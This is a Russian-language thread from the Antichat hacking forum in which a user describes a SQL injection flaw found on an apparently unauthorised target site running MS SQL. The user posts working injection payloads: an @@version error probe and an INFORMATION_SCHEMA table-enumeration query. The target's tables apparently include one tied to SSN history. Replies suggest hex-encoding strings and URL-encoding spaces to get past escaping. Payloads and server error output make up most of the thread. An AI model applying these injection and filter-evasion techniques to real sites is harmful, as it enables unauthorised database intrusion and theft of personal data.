Форум АНТИЧАТ - Проблема , Ms Sql

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Проблема , Ms Sql (https://forum.antichat.xyz/showthread.php?t=48257)

Проблема , Ms Sql

Нашел вообщем дыру на сайте...
Стоит MS SQL
POST запросы....

Код:

' or 1=@@version--

работает, получается экранирования кавычек нету?так?!

Пробую

Код:

' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('change_ssn_history'))--

Здесь ругается:

Код:

Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in C:\AppServ2\www\index.php on line 17



Warning: mssql_query() [function.mssql-query]: Query failed in C:\AppServ2\www\index.php on line 17



Warning: mssql_num_rows(): supplied argument is not a valid MS SQL-result resource in C:\AppServ2\www\index.php on line 18

Че за?

странно ( может ограничение по длине запроса ?
хотя в таком случае не должно быть "\"

пробуй hex

Код:

' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (0x6368616E67655F73736E5F686973746F7279)--

мож поможет?

там php а не asp остюда кривой вывод.

Змен пробелы на %20 or + or %2B

если че стукни в асю буду свободен посмотрю.

У меня была такая фигня, что кавычки нельзя использовать...

See this - http://forum.antichat.ru/showpost.php?p=453569&postcount=28